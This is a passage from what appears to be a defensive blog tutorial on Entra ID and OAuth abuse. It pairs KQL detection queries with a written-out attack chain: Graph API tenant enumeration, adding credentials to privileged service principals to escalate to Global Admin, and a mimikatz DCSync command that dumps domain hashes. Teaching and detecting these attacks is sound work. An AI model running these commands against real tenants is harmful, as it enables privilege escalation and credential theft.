class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">subscription-id</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> $</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"> secrets.AZURE_SUBSCRIPTION_ID </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># If attacker can trigger this workflow (via PR to public repo,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># or compromise of a maintainer account), they get the token</span><br></span></code></pre></div></div>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"detection-for-service-principal-abuse\">Detection for Service Principal Abuse<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#detection-for-service-principal-abuse\" class=\"hash-link\" aria-label=\"Direct link to Detection for Service Principal Abuse\" title=\"Direct link to Detection for Service Principal Abuse\" translate=\"no\">​</a></h3>\n<div class=\"language-kusto codeBlockContainer_Ckt0 theme-code-block\" 
style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-kusto codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">// KQL: Detect new credentials added to service principals</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">AuditLogs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where OperationName in (</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    \"Add service principal credentials\",</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    \"Update application – Certificates and secrets management\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| extend</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    ModifiedApp = tostring(TargetResources[0].displayName),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    ModifiedBy = tostring(InitiatedBy.user.userPrincipalName),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    ModifiedByApp = tostring(InitiatedBy.app.displayName)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| project TimeGenerated, ModifiedApp, ModifiedBy, ModifiedByApp, Result</span><br></span><span class=\"token-line\" 
style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where Result == \"success\"</span><br></span></code></pre></div></div>\n<div class=\"language-kusto codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-kusto codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">// KQL: Hunt for service principal sign-ins from unexpected IPs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">AADServicePrincipalSignInLogs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where ResultType == 0</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| summarize </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    IPList = make_set(IPAddress),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Countries = make_set(LocationDetails.countryOrRegion),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    SignInCount = count()</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    by ServicePrincipalName, bin(TimeGenerated, 1d)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where array_length(IPList) &gt; 3 or array_length(Countries) &gt; 1</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| sort by TimeGenerated 
desc</span><br></span></code></pre></div></div>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"section-5-lateral-movement-via-entra-id--from-one-account-to-the-whole-tenant\">Section 5: Lateral Movement via Entra ID  From One Account to the Whole Tenant<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#section-5-lateral-movement-via-entra-id--from-one-account-to-the-whole-tenant\" class=\"hash-link\" aria-label=\"Direct link to Section 5: Lateral Movement via Entra ID  From One Account to the Whole Tenant\" title=\"Direct link to Section 5: Lateral Movement via Entra ID  From One Account to the Whole Tenant\" translate=\"no\">​</a></h2>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"how-attackers-move-from-a-compromised-user-to-full-tenant-control\">How Attackers Move From a Compromised User to Full Tenant Control<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#how-attackers-move-from-a-compromised-user-to-full-tenant-control\" class=\"hash-link\" aria-label=\"Direct link to How Attackers Move From a Compromised User to Full Tenant Control\" title=\"Direct link to How Attackers Move From a Compromised User to Full Tenant Control\" translate=\"no\">​</a></h3>\n<p>Getting a single user's tokens is usually not the endgame. 
The objective is typically:</p>\n<ul>\n<li class=\"\">Escalating to a Global Administrator</li>\n<li class=\"\">Accessing high-value data across multiple users</li>\n<li class=\"\">Establishing persistent access that survives incident response</li>\n<li class=\"\">Pivoting to Azure resources or on-premises AD via hybrid join</li>\n</ul>\n<p>Here is the attack chain an advanced threat actor executes after initial compromise.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"step-1-enumerate-the-tenant-stay-quiet\">Step 1: Enumerate the Tenant (Stay Quiet)<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#step-1-enumerate-the-tenant-stay-quiet\" class=\"hash-link\" aria-label=\"Direct link to Step 1: Enumerate the Tenant (Stay Quiet)\" title=\"Direct link to Step 1: Enumerate the Tenant (Stay Quiet)\" translate=\"no\">​</a></h3>\n<div class=\"language-python codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-python codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Graph API enumeration  all legitimate API calls, no scanning tools</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">headers </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"Authorization\"</span><span class=\"token punctuation\" 
style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"Bearer </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">access_token</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># 1. 
Get full user directory  who's valuable?</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">users </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> requests</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">get</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"https://graph.microsoft.com/v1.0/users\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"?$select=id,displayName,mail,jobTitle,department,officeLocation\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"&amp;$top=999\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    headers</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\">headers</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">json</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 
16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># 2. Find all role assignments  who has admin?</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">roles </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> requests</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">get</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"https://graph.microsoft.com/v1.0/roleManagement/directory/roleAssignments\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"?$expand=principal\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    headers</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\">headers</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token punctuation\" 
style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">json</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Filter for Global Admins, privileged roles</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">privileged_roles </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"Global Administrator\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"Privileged Role Administrator\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"Application Administrator\"</span><span class=\"token 
punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"Exchange Administrator\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"Security Administrator\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># 3. 
Find service principals with high privileges</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">high_value_sps </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> requests</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">get</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"https://graph.microsoft.com/v1.0/servicePrincipals\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"?$select=id,displayName,appId,appRoles\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"&amp;$top=999\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    headers</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\">headers</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">json</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 
16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># 4. Check if the current user has any admin roles</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">my_roles </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> requests</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">get</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"https://graph.microsoft.com/v1.0/me/transitiveMemberOf/microsoft.graph.directoryRole\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    headers</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\">headers</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">json</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 
16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><br></span></code></pre></div></div>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"step-2-privilege-escalation-paths\">Step 2: Privilege Escalation Paths<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#step-2-privilege-escalation-paths\" class=\"hash-link\" aria-label=\"Direct link to Step 2: Privilege Escalation Paths\" title=\"Direct link to Step 2: Privilege Escalation Paths\" translate=\"no\">​</a></h3>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"path-a-application-administrator--global-administrator\">Path A: Application Administrator → Global Administrator<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#path-a-application-administrator--global-administrator\" class=\"hash-link\" aria-label=\"Direct link to Path A: Application Administrator → Global Administrator\" title=\"Direct link to Path A: Application Administrator → Global Administrator\" translate=\"no\">​</a></h4>\n<p>An account with the Application Administrator role can add credentials to any application service principal. 
If any application has Global Admin-level permissions, this is a one-step escalation.</p>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Attacker has Application Administrator role</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Find apps with Directory.ReadWrite.All or RoleManagement.ReadWrite.Directory</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$apps = Get-MgServicePrincipal -All</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$highPrivApps = foreach ($app in $apps) {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $assignments = Get-MgServicePrincipalAppRoleAssignment -ServicePrincipalId $app.Id</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $highPriv = $assignments | Where-Object { </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        $_.ResourceDisplayName -eq \"Microsoft Graph\" -and</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        # These permissions are effectively Global Admin</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        $app.AppRoles.Value -match \"RoleManagement.ReadWrite|Directory.ReadWrite\"</span><br></span><span 
class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    if ($highPriv) { $app }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">}</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Add credential to high-priv app, use it to assign Global Admin to attacker account</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$cred = Add-MgServicePrincipalPassword -ServicePrincipalId $highPrivApps[0].Id -PasswordCredential @{</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    DisplayName = \"backup-credential\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    EndDateTime = (Get-Date).AddYears(1)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">}</span><br></span></code></pre></div></div>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"path-b-hybrid-identity-abuse-cloud--on-premises\">Path B: Hybrid Identity Abuse (Cloud → On-Premises)<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#path-b-hybrid-identity-abuse-cloud--on-premises\" class=\"hash-link\" aria-label=\"Direct link to Path B: Hybrid Identity Abuse (Cloud → On-Premises)\" title=\"Direct link to Path B: Hybrid Identity Abuse (Cloud → On-Premises)\" translate=\"no\">​</a></h4>\n<p>If the tenant uses Entra Connect (formerly Azure AD Connect) for hybrid identity sync, the sync account has extensive on-premises Active Directory 
privileges. Compromising it is a path to on-premises domain admin.</p>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Identify Entra Connect sync account (usually MSOL_ or AAD_ prefix)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Get-ADUser -Filter {SamAccountName -like \"MSOL_*\" -or SamAccountName -like \"AAD_*\"} -Properties *</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># The sync account has DCSync rights on the domain by default</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># An attacker with its credentials can dump all AD hashes</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">mimikatz # lsadump::dcsync /domain:corp.local /user:krbtgt</span><br></span></code></pre></div></div>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"path-c-conditional-access-policy-gaps\">Path C: Conditional Access Policy Gaps<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#path-c-conditional-access-policy-gaps\" class=\"hash-link\" aria-label=\"Direct link to Path C: Conditional Access Policy Gaps\" title=\"Direct link to Path C: Conditional Access Policy Gaps\" translate=\"no\">​</a></h4>\n<p>Most 
organizations have Conditional Access policies protecting interactive logins but forget that:</p>\n<ul>\n<li class=\"\">Legacy authentication protocols (SMTP AUTH, IMAP, Exchange ActiveSync) bypass CA</li>\n<li class=\"\">Service principal authentication bypasses nearly all CA policies</li>\n<li class=\"\">Certain workload identities are excluded from policies for \"operational reasons\"</li>\n</ul>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Enumerate Conditional Access policies to find gaps</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Connect-MgGraph -Scopes \"Policy.Read.All\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$policies = Get-MgIdentityConditionalAccessPolicy -All</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">foreach ($policy in $policies) {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Write-Output \"Policy: $($policy.DisplayName)\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Write-Output \"  State: 
$($policy.State)\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Write-Output \"  Excluded Users: $($policy.Conditions.Users.ExcludeUsers -join ', ')\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Write-Output \"  Excluded Groups: $($policy.Conditions.Users.ExcludeGroups -join ', ')\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Write-Output \"  Excluded Apps: $($policy.Conditions.Applications.ExcludeApplications -join ', ')\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Write-Output \"  Client App Types: $($policy.Conditions.ClientAppTypes -join ', ')\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    # Red flag: \"all\" is NOT in ClientAppTypes  legacy auth not blocked</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    if ($policy.Conditions.ClientAppTypes -notcontains \"exchangeActiveSync\" -and</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        $policy.Conditions.ClientAppTypes -notcontains \"other\") {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        Write-Output \"  *** LEGACY AUTH NOT COVERED ***\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token 